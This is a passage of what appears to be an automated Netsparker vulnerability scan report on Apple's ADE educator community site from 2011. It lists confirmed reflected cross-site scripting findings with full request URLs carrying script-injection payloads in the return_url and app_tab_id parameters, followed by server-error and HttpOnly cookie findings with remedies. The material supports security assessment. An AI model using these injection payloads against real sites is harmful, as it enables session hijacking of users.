return_url GET http://ade.apple.com/ade/user_apps_canvas.php?id=$id1&app_tab_id=$id2%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000449)%3C%2Fscript%3E
app_tab_id GET $id2'"--></style></script><script>alert(0x000449)</script>

Request

GET /ade/login.php?return_url=http%3A%2F%2Fade.apple.com%2Fade%2Fuser_apps_canvas.php%3Fid%3D%24id1%26app_tab_id%3D%24id2%2500%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%280x000449%29%253C%252Fscript%253E HTTP/1.1
Referer: http://ade.apple.com/ade/user_apps_canvas.php?id=$id1&app_tab_id=$id2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 15 Jul 2011 18:23:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Language: en
Set-Cookie: SEP_Forum_before_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:23:27 GMT; path=/,SEP_Forum_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:23:27 GMT; path=/
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
MS-Author-Via: DAV
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
<title>Apple Distinguished Educator Community - Account Login</title>
<base href='http://ade.apple.com/ade/' />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=1025" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<meta name="description" content="Welcome to the Apple Distinguished Educators (ADE) online community. Membership in this site is for ADE members only.<br><br>If you already have an account, please log-in below." />
<meta name="keywords" content="iTunes, Podcast Producer, Mac OS X, Education, Pedagogy, Software" />
<meta name="copyright" content="Apple Inc. - 2011" />
<meta name="author" content="Apple Inc." />
<meta name="Distribution" content="Global" />
<meta name="Rating" content="General" />
<meta name="Robots" content="INDEX,FOLLOW" />
<meta name="Revisit-after" content="1 Day" />
<link rel="apple-touch-icon" href="images/ade_webclip_icon.png">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script>jqcc=jQuery.noConflict(true);</script>

<link rel="stylesheet" href="./templates/styles_global.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles.css" title="stylesheet" type="text/css" />

<script type="text/javascript" src="./include/js/mootools12-min.js"></script>
<script type="text/javascript" src="./include/js/mootools12-more.js"></script>

<script type="text/javascript" src="./include/js/core-min.js"></script>


<script type="text/javascript">
<!--
var SocialEngine = new SocialEngineAPI.Base();

// Core
SocialEngine.Core = new SocialEngineAPI.Core();
SocialEngine.Core.ImportSettings({"setting_url":false,"setting_username":true});
SocialEngine.Core.ImportPlugins(["apps","userpages","article","blog","group","sep_group_integration","forum","gmap","album","geo","poll","epayment","business","businessarticle","businessgroup","businessblog","scheduler","radcodes","plugin_controls"]);
SocialEngine.RegisterModule(SocialEngine.Core);

// URL
SocialEngine.URL = new SocialEngineAPI.URL();
SocialEngine.URL.ImportURLBase('http://ade.apple.com/ade/');
SocialEngine.URL.ImportURLInfo({"albums":{"url_file":"albums","url_regular":"albums.php?user=$user","url_subdirectory":"$user\/albums\/"},"album":{"url_file":"album","url_regular":"album.php?user=$user&album_id=$id1","url_subdirectory":"$user\/albums\/$id1"},"album_file":{"url_file":"album_file","url_regular":"album_file.php?user=$user&album_id=$id1&media_id=$id2","url_subdirectory":"$user\/albums\/$id1\/$id2"},"blog":{"url_file":"blog","url_regular":"blog.php?user=$user","url_subdirectory":"$user\/blog\/"},"blog_entry":{"url_file":"blog_entry","url_regular":"blog.php?user=$user&blogentry_id=$id1","url_subdirectory":"$user\/blog\/$id1\/"},"blog_trackback":{"url_file":"blog_trackback","url_regular":"blog_ajax.php?task=trackback&user=$user&blogentry_id=$id1","url_subdirectory":"$user\/trackback\/$id1\/"},"articles":{"url_file":"articles","url_regular":"articles.php?user=$user","url_subdirectory":"$user\/articles\/"},"article":{"url_file":"article","url_regular":"article.php?article_id=$id1","url_subdirectory":"article\/$id1\/$id2"},"group":{"url_file":"group","url_regular":"group.php?group_id=$id1","url_subdirectory":"group\/$id1\/"},"group_media":{"url_file":"group_media","url_regular":"group_album_file.php?group_id=$id1&groupmedia_id=$id2","url_subdirectory":"group\/$id1\/album\/$id2\/"},"group_discussion":{"url_file":"group_discussion","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2","url_subdirectory":"group\/$id1\/discussion\/$id2\/"},"group_discussion_post":{"url_file":"group_discussion_post","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2&grouppost_id=$id3","url_subdirectory":"group\/$id1\/discussion\/$id2\/$id3\/"},"app_canvas":{"url_file":"app_canvas","url_regular":"user_apps_canvas.php?id=$id1&app_tab_id=$id2","url_subdirectory":"user_apps_canvas.php?id=$id1&app_tab_id=$id2"},"app_page":{"url_file":"app_page","url_regular":"apppage.php?id=$id1","url_subdirectory":"apppage.php?id=$id1"},"app":{"url_file":"app","url_regular":"app.php?id=$id1","url_subdirectory":"application\/$id1\/"},"userpage":{"url_file":"userpage","url_regular":"userpage.php?page_id=$id1","url_subdirectory":"userpage.php?page_id=$id1"},"business":{"url_file":"business","url_regular":"business.php?business_id=$id1","url_subdirectory":"business\/$id1\/$user\/"},"business_media":{"url_file":"business_media","url_regular":"business_album_file.php?business_id=$id1&businessmedia_id=$id2","url_subdirectory":"business\/$id1\/album\/$id2\/"},"business_category":{"url_file":"business_category","url_regular":"browse_businesses.php?businesscat_id=$id1","url_subdirectory":"businesses\/category\/$id1\/$user\/"},"business_tag":{"url_file":"business_tag","url_regular":"browse_businesses.php?tag=$id1","url_subdirectory":"businesses\/tag\/$id1\/"},"business_neighborhood":{"url_file":"business_neighborhood","url_regular":"browse_businesses.php?neighborhood=$id1","url_subdirectory":"businesses\/neighborhood\/$id1\/"},"business_country":{"url_file":"business_country","url_regular":"browse_businesses.php?type=location&country=$id1","url_subdirectory":"businesses\/location\/$id1\/"},"business_province":{"url_file":"business_province","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2","url_subdirectory":"businesses\/location\/$id1\/$id2\/"},"business_city":{"url_file":"business_city","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2&city=$id3","url_subdirectory":"businesses\/location\/$id1\/$id2\/$id3\/"},"polls":{"url_file":"polls","url_regular":"polls.php?user=$user","url_subdirectory":"$user\/polls\/"},"poll":{"url_file":"poll","url_regular":"poll.php?user=$user&poll_id=$id1","url_subdirectory":"$user\/polls\/$id1\/"},"profile":{"url_regular":"profile.php?user=$user","url_subdirectory":"$user\/"}});
SocialEngine.RegisterModule(SocialEngine.URL);

// Language
SocialEngine.Language = new SocialEngineAPI.Language();
SocialEngine.RegisterModule(SocialEngine.Language);

// User - Viewer
SocialEngine.Viewer = new SocialEngineAPI.User();
SocialEngine.Viewer.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Viewer);

// User - Owner
SocialEngine.Owner = new SocialEngineAPI.User();
SocialEngine.Owner.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Owner);

// Back
SELanguage = SocialEngine.Language;
//-->
</script>


<script type="text/javascript">
<!--
// ADD TIP FUNCTION
window.addEvent('load', function()
{
var Tips1 = new Tips($$('.Tips1'));
});
//-->
</script>



<link rel="stylesheet" href="./templates/styles_apps.css?315:1" title="stylesheet" type="text/css">
<!--[if lte IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->
<!--[if lt IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie6.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->

<script type="text/javascript" src="./include/js/semods.js?315:1"></script>
<script type="text/javascript" src="./include/js/semods_apps.js?315:1"></script>

<script type="text/javascript" src="./include/js/smoothboxEx.js?315:1"></script>

<script type="text/javascript" src="./include/js/moofacebox/moofacebox.js?315:1"></script>
<link rel="stylesheet" href="./include/js/moofacebox/moofacebox.css?315:1" title="stylesheet" type="text/css">



<!--[if lt IE 7]>
<script defer type="text/javascript" src="./include/js/pngfix.js"></script>
<![endif]-->

<link rel="stylesheet" href="./templates/styles_userpages.css" title="stylesheet" type="text/css">
<link rel="stylesheet" href="./templates/styles_article.css" title="stylesheet" type="text/css">
<script type="text/javascript" src="./include/fckeditor/fckeditor.js"></script>
<script type="text/javascript" src="./include/js/showhide.js"></script>

<link rel="stylesheet" href="./templates/styles_sep_group_integration.css" title="stylesheet" type="text/css" /><link rel="stylesheet" href="./templates/forum/forum_styles.css" title="stylesheet" type="text/css" />



<script type="text/javascript" src="./include/forum/fckeditor/fckeditor.js"></script>


<link rel="stylesheet" href="./templates/styles_gmap.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles_business.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessarticle.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessgroup.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessblog.css" title="stylesheet" type="text/css" />

<link rel="stylesheet" href="./templates/styles_radcodes.css" title="stylesheet" type="text/css" />
<script type="text/javascript" src="./include/js/radcodes.js"></script>
<link rel="stylesheet" href="./templates/styles_epayment.css" title="stylesheet" type="text/css" />


<style type='text/css'></style>


<script type="text/javascript" src="./promos/promos.js"></script>
<link rel="stylesheet" href="./promos/promos.css" type="text/css" charset="utf-8">




<script type="text/javascript">

// Fade in/out an element by id.
function fade_element(id, method, the_duration) {
var e = document.getElementById(id);
if (the_duration == null){
the_duration = 500;
}
if(method == 'toggle'){
// Requires this CSS: #account_tools{opacity:0;display:block;visibility:hidden;}
if(e.style.opacity == 1){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}else{
e.set('tween',{duration : the_duration}).fade([0,1]);
e.stop();
}
}
if(method == 'out'){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}
}

</script>

</head>
<body>
<iframe id='ajaxframe' name='ajaxframe' style='display: none;' src='javascript:false;'></iframe>

<!-- END header_global.tpl -->

<!-- START header.tpl -->
<div id="overview">
<div id="smoothbox_container"></div>


<div id="productheader">
<div id="logotype">
<a href="user_home.php">
<img id="logotype" src="./images/ade_logotype.png" alt="Apple Distinguished Educator Community" width="300" height="35" />
</a>
</div>

</div>








<div id="main">

<div id="content">





<div style='padding-top:20px;margin-bottom:20px;padding-left:30px;padding-right:30px;'>
<!-- END header.tpl -->


<div id="hero" style='margin: -20px 0 0 -30px; overflow: hidden;'>
<img src='./images/login_hero.jpg' style='width: 980px; height: 270px; margin-top: 5px;' />
</div>


<div id="login_text">
<p>The <a href='http://www.apple.com/education/apple-distinguished-educator/'>Apple Distinguished Educator (ADE) program</a> is a relationship program focused on educational excellence and leadership. ADEs are members of a select group of K-12 and Higher Education professionals possessing an identified expertise in educational technology leadership. This group of over 1,500 educators spans the globe with membership in the USA, Asia, Australia, Canada, Europe, Japan, Mexico and New Zealand.</p>

<h3>ADE Member Roles</h3>
<p>Members of the ADE community fulfill four primary roles in their interaction with Apple:</p>

<h4>Advocates</h4>
<p>ADEs are passionate advocates of the potential of Apple technologies and they provide expert assistance and best practices to educators and policy makers. ADEs are frequent presenters at local, state, national and international educational conferences.</p>

<h4>Advisors</h4>
<p>ADEs provide valuable input to Apple on the realities of integrating instructional technology into learning environments.</p>

<h4>Authors</h4>
<p>ADEs publish authentic work to share with peers such as teaching and leadership best practices, exemplary lesson ideas, and a range of content items that showcase Apple products and technologies for the advancement of education.</p>

<h4>Ambassadors</h4>
<p>ADEs are innovators in building community and capacity for teaching and learning in a global context. Through online projects and collaboration tools, they empower each other to expand the walls of the classroom and bring global experiences to classrooms everywhere.</p>

<!--iframe src='http://education.apple.com/ade_apply/' id="apply"></iframe>-->

<h3>Interested in becoming an ADE?</h3>
<p>For more information on applying to the Apple Distinguished Educator Program, visit the <a href='http://ade.apple.com/apply/'>Class of 2011 Application Page</a>.</p>

</div>

<div class="right" style='padding: 20px; width: 210px; float: right; background: #f0f0f0; -webkit-border-radius: 5px; border-radius: 5px; -moz-border-radius: 5px;'>
<form action='login.php' method='POST' name='login' id='login'>
<h3>Login for ADE Program Members Only</h3>

<label>Email</label>
<input type='text' class='text' name='email' id='email' value='' size='30' maxlength='70'>

<label style='margin-top: 1em; display: block;'>Password</label>
<input type='password' class='text' name='password' id='password' size='30' maxlength='50'>


<br />
<br />
<input type='submit' class='button' value='Login' />&nbsp;
<input type='checkbox' class='checkbox' name='persistent' i..
- /ade/login.php

/ade/login.php CONFIRMED

http://ade.apple.com/ade/login.php?return_url=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%..

Parameters

Parameter Type Value
return_url GET %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0009F8%29%3C%2Fscript%3E

Request

GET /ade/login.php?return_url=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0009F8%2529%253C%252Fscript%253E HTTP/1.1
Referer: http://ade.apple.com/ade/user_apps_canvas.php?id=$id1&app_tab_id=$id2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=rc122d8snhc6bjchbki89sqfijpg21kk
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 15 Jul 2011 18:30:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Language: en
Set-Cookie: SEP_Forum_before_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:30:25 GMT; path=/,SEP_Forum_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:30:25 GMT; path=/
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
MS-Author-Via: DAV
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
<title>Apple Distinguished Educator Community - Account Login</title>
<base href='http://ade.apple.com/ade/' />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=1025" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<meta name="description" content="Welcome to the Apple Distinguished Educators (ADE) online community. Membership in this site is for ADE members only.<br><br>If you already have an account, please log-in below." />
<meta name="keywords" content="iTunes, Podcast Producer, Mac OS X, Education, Pedagogy, Software" />
<meta name="copyright" content="Apple Inc. - 2011" />
<meta name="author" content="Apple Inc." />
<meta name="Distribution" content="Global" />
<meta name="Rating" content="General" />
<meta name="Robots" content="INDEX,FOLLOW" />
<meta name="Revisit-after" content="1 Day" />
<link rel="apple-touch-icon" href="images/ade_webclip_icon.png">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script>jqcc=jQuery.noConflict(true);</script>

<link rel="stylesheet" href="./templates/styles_global.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles.css" title="stylesheet" type="text/css" />

<script type="text/javascript" src="./include/js/mootools12-min.js"></script>
<script type="text/javascript" src="./include/js/mootools12-more.js"></script>

<script type="text/javascript" src="./include/js/core-min.js"></script>


<script type="text/javascript">
<!--
var SocialEngine = new SocialEngineAPI.Base();

// Core
SocialEngine.Core = new SocialEngineAPI.Core();
SocialEngine.Core.ImportSettings({"setting_url":false,"setting_username":true});
SocialEngine.Core.ImportPlugins(["apps","userpages","article","blog","group","sep_group_integration","forum","gmap","album","geo","poll","epayment","business","businessarticle","businessgroup","businessblog","scheduler","radcodes","plugin_controls"]);
SocialEngine.RegisterModule(SocialEngine.Core);

// URL
SocialEngine.URL = new SocialEngineAPI.URL();
SocialEngine.URL.ImportURLBase('http://ade.apple.com/ade/');
SocialEngine.URL.ImportURLInfo({"albums":{"url_file":"albums","url_regular":"albums.php?user=$user","url_subdirectory":"$user\/albums\/"},"album":{"url_file":"album","url_regular":"album.php?user=$user&album_id=$id1","url_subdirectory":"$user\/albums\/$id1"},"album_file":{"url_file":"album_file","url_regular":"album_file.php?user=$user&album_id=$id1&media_id=$id2","url_subdirectory":"$user\/albums\/$id1\/$id2"},"blog":{"url_file":"blog","url_regular":"blog.php?user=$user","url_subdirectory":"$user\/blog\/"},"blog_entry":{"url_file":"blog_entry","url_regular":"blog.php?user=$user&blogentry_id=$id1","url_subdirectory":"$user\/blog\/$id1\/"},"blog_trackback":{"url_file":"blog_trackback","url_regular":"blog_ajax.php?task=trackback&user=$user&blogentry_id=$id1","url_subdirectory":"$user\/trackback\/$id1\/"},"articles":{"url_file":"articles","url_regular":"articles.php?user=$user","url_subdirectory":"$user\/articles\/"},"article":{"url_file":"article","url_regular":"article.php?article_id=$id1","url_subdirectory":"article\/$id1\/$id2"},"group":{"url_file":"group","url_regular":"group.php?group_id=$id1","url_subdirectory":"group\/$id1\/"},"group_media":{"url_file":"group_media","url_regular":"group_album_file.php?group_id=$id1&groupmedia_id=$id2","url_subdirectory":"group\/$id1\/album\/$id2\/"},"group_discussion":{"url_file":"group_discussion","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2","url_subdirectory":"group\/$id1\/discussion\/$id2\/"},"group_discussion_post":{"url_file":"group_discussion_post","url_regular":"group_discussion_view.php?group_id=$id1&grouptopic_id=$id2&grouppost_id=$id3","url_subdirectory":"group\/$id1\/discussion\/$id2\/$id3\/"},"app_canvas":{"url_file":"app_canvas","url_regular":"user_apps_canvas.php?id=$id1&app_tab_id=$id2","url_subdirectory":"user_apps_canvas.php?id=$id1&app_tab_id=$id2"},"app_page":{"url_file":"app_page","url_regular":"apppage.php?id=$id1","url_subdirectory":"apppage.php?id=$id1"},"app":{"url_file":"app","url_regular":"app.php?id=$id1","url_subdirectory":"application\/$id1\/"},"userpage":{"url_file":"userpage","url_regular":"userpage.php?page_id=$id1","url_subdirectory":"userpage.php?page_id=$id1"},"business":{"url_file":"business","url_regular":"business.php?business_id=$id1","url_subdirectory":"business\/$id1\/$user\/"},"business_media":{"url_file":"business_media","url_regular":"business_album_file.php?business_id=$id1&businessmedia_id=$id2","url_subdirectory":"business\/$id1\/album\/$id2\/"},"business_category":{"url_file":"business_category","url_regular":"browse_businesses.php?businesscat_id=$id1","url_subdirectory":"businesses\/category\/$id1\/$user\/"},"business_tag":{"url_file":"business_tag","url_regular":"browse_businesses.php?tag=$id1","url_subdirectory":"businesses\/tag\/$id1\/"},"business_neighborhood":{"url_file":"business_neighborhood","url_regular":"browse_businesses.php?neighborhood=$id1","url_subdirectory":"businesses\/neighborhood\/$id1\/"},"business_country":{"url_file":"business_country","url_regular":"browse_businesses.php?type=location&country=$id1","url_subdirectory":"businesses\/location\/$id1\/"},"business_province":{"url_file":"business_province","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2","url_subdirectory":"businesses\/location\/$id1\/$id2\/"},"business_city":{"url_file":"business_city","url_regular":"browse_businesses.php?type=location&country=$id1&province=$id2&city=$id3","url_subdirectory":"businesses\/location\/$id1\/$id2\/$id3\/"},"polls":{"url_file":"polls","url_regular":"polls.php?user=$user","url_subdirectory":"$user\/polls\/"},"poll":{"url_file":"poll","url_regular":"poll.php?user=$user&poll_id=$id1","url_subdirectory":"$user\/polls\/$id1\/"},"profile":{"url_regular":"profile.php?user=$user","url_subdirectory":"$user\/"}});
SocialEngine.RegisterModule(SocialEngine.URL);

// Language
SocialEngine.Language = new SocialEngineAPI.Language();
SocialEngine.RegisterModule(SocialEngine.Language);

// User - Viewer
SocialEngine.Viewer = new SocialEngineAPI.User();
SocialEngine.Viewer.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Viewer);

// User - Owner
SocialEngine.Owner = new SocialEngineAPI.User();
SocialEngine.Owner.ImportUserInfo({"user_exists":false});
SocialEngine.RegisterModule(SocialEngine.Owner);

// Back
SELanguage = SocialEngine.Language;
//-->
</script>


<script type="text/javascript">
<!--
// ADD TIP FUNCTION
window.addEvent('load', function()
{
var Tips1 = new Tips($$('.Tips1'));
});
//-->
</script>



<link rel="stylesheet" href="./templates/styles_apps.css?315:1" title="stylesheet" type="text/css">
<!--[if lte IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->
<!--[if lt IE 7]>
<link rel="stylesheet" href="./templates/styles_apps_ie6.css?315:1" type="text/css" media="projection, screen" />
<![endif]-->

<script type="text/javascript" src="./include/js/semods.js?315:1"></script>
<script type="text/javascript" src="./include/js/semods_apps.js?315:1"></script>

<script type="text/javascript" src="./include/js/smoothboxEx.js?315:1"></script>

<script type="text/javascript" src="./include/js/moofacebox/moofacebox.js?315:1"></script>
<link rel="stylesheet" href="./include/js/moofacebox/moofacebox.css?315:1" title="stylesheet" type="text/css">



<!--[if lt IE 7]>
<script defer type="text/javascript" src="./include/js/pngfix.js"></script>
<![endif]-->

<link rel="stylesheet" href="./templates/styles_userpages.css" title="stylesheet" type="text/css">
<link rel="stylesheet" href="./templates/styles_article.css" title="stylesheet" type="text/css">
<script type="text/javascript" src="./include/fckeditor/fckeditor.js"></script>
<script type="text/javascript" src="./include/js/showhide.js"></script>

<link rel="stylesheet" href="./templates/styles_sep_group_integration.css" title="stylesheet" type="text/css" /><link rel="stylesheet" href="./templates/forum/forum_styles.css" title="stylesheet" type="text/css" />



<script type="text/javascript" src="./include/forum/fckeditor/fckeditor.js"></script>


<link rel="stylesheet" href="./templates/styles_gmap.css" title="stylesheet" type="text/css" />
<link rel="stylesheet" href="./templates/styles_business.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessarticle.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessgroup.css" title="stylesheet" type="text/css" />


<link rel="stylesheet" href="./templates/styles_businessblog.css" title="stylesheet" type="text/css" />

<link rel="stylesheet" href="./templates/styles_radcodes.css" title="stylesheet" type="text/css" />
<script type="text/javascript" src="./include/js/radcodes.js"></script>
<link rel="stylesheet" href="./templates/styles_epayment.css" title="stylesheet" type="text/css" />


<style type='text/css'></style>


<script type="text/javascript" src="./promos/promos.js"></script>
<link rel="stylesheet" href="./promos/promos.css" type="text/css" charset="utf-8">




<script type="text/javascript">

// Fade in/out an element by id.
function fade_element(id, method, the_duration) {
var e = document.getElementById(id);
if (the_duration == null){
the_duration = 500;
}
if(method == 'toggle'){
// Requires this CSS: #account_tools{opacity:0;display:block;visibility:hidden;}
if(e.style.opacity == 1){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}else{
e.set('tween',{duration : the_duration}).fade([0,1]);
e.stop();
}
}
if(method == 'out'){
e.set('tween',{duration : the_duration, wait:true}).fade([1,0]);
e.stop();
}
}

</script>

</head>
<body>
<iframe id='ajaxframe' name='ajaxframe' style='display: none;' src='javascript:false;'></iframe>

<!-- END header_global.tpl -->

<!-- START header.tpl -->
<div id="overview">
<div id="smoothbox_container"></div>


<div id="productheader">
<div id="logotype">
<a href="user_home.php">
<img id="logotype" src="./images/ade_logotype.png" alt="Apple Distinguished Educator Community" width="300" height="35" />
</a>
</div>

</div>








<div id="main">

<div id="content">





<div style='padding-top:20px;margin-bottom:20px;padding-left:30px;padding-right:30px;'>
<!-- END header.tpl -->


<div id="hero" style='margin: -20px 0 0 -30px; overflow: hidden;'>
<img src='./images/login_hero.jpg' style='width: 980px; height: 270px; margin-top: 5px;' />
</div>


<div id="login_text">
<p>The <a href='http://www.apple.com/education/apple-distinguished-educator/'>Apple Distinguished Educator (ADE) program</a> is a relationship program focused on educational excellence and leadership. ADEs are members of a select group of K-12 and Higher Education professionals possessing an identified expertise in educational technology leadership. This group of over 1,500 educators spans the globe with membership in the USA, Asia, Australia, Canada, Europe, Japan, Mexico and New Zealand.</p>

<h3>ADE Member Roles</h3>
<p>Members of the ADE community fulfill four primary roles in their interaction with Apple:</p>

<h4>Advocates</h4>
<p>ADEs are passionate advocates of the potential of Apple technologies and they provide expert assistance and best practices to educators and policy makers. ADEs are frequent presenters at local, state, national and international educational conferences.</p>

<h4>Advisors</h4>
<p>ADEs provide valuable input to Apple on the realities of integrating instructional technology into learning environments.</p>

<h4>Authors</h4>
<p>ADEs publish authentic work to share with peers such as teaching and leadership best practices, exemplary lesson ideas, and a range of content items that showcase Apple products and technologies for the advancement of education.</p>

<h4>Ambassadors</h4>
<p>ADEs are innovators in building community and capacity for teaching and learning in a global context. Through online projects and collaboration tools, they empower each other to expand the walls of the classroom and bring global experiences to classrooms everywhere.</p>

<!--iframe src='http://education.apple.com/ade_apply/' id="apply"></iframe>-->

<h3>Interested in becoming an ADE?</h3>
<p>For more information on applying to the Apple Distinguished Educator Program, visit the <a href='http://ade.apple.com/apply/'>Class of 2011 Application Page</a>.</p>

</div>

<div class="right" style='padding: 20px; width: 210px; float: right; background: #f0f0f0; -webkit-border-radius: 5px; border-radius: 5px; -moz-border-radius: 5px;'>
<form action='login.php' method='POST' name='login' id='login'>
<h3>Login for ADE Program Members Only</h3>

<label>Email</label>
<input type='text' class='text' name='email' id='email' value='' size='30' maxlength='70'>

<label style='margin-top: 1em; display: block;'>Password</label>
<input type='password' class='text' name='password' id='password' size='30' maxlength='50'>


<br />
<br />
<input type='submit' class='button' value='Login' />&nbsp;
<input type='checkbox' class='checkbox' name='persistent' i..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /ade/group_discussions.php

/ade/group_discussions.php CONFIRMED

http://ade.apple.com/ade/group_discussions.php?iid=$id1&c=forum&op=index

Request

GET /ade/group_discussions.php?iid=$id1&c=forum&op=index HTTP/1.1
Referer: http://ade.apple.com/ade/group.php?group_id=$id1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 15 Jul 2011 18:15:30 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Language: en
Set-Cookie: SEP_Forum_before_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:15:29 GMT; path=/,SEP_Forum_last_login_date=deleted; expires=Thu, 15-Jul-2010 18:15:29 GMT; path=/
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
MS-Author-Via: DAV
Content-Length: 0
Connection: close
Content-Type: text/html


Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /ade/apppage.php

/ade/apppage.php CONFIRMED

http://ade.apple.com/ade/apppage.php?id=$id1

Identified Cookie

SEP_Forum_before_last_login_date

Request

GET /ade/apppage.php?id=$id1 HTTP/1.1
Referer: http://ade.apple.com/ade/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ade.apple.com
Cookie: PHPSESSID=745uereijepcsq4aq0t9fu3jb7f6rpd5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Fri, 15 Jul 2011 18:15:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.3.0
X-Powered-By: PHP/5.3.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Language: en
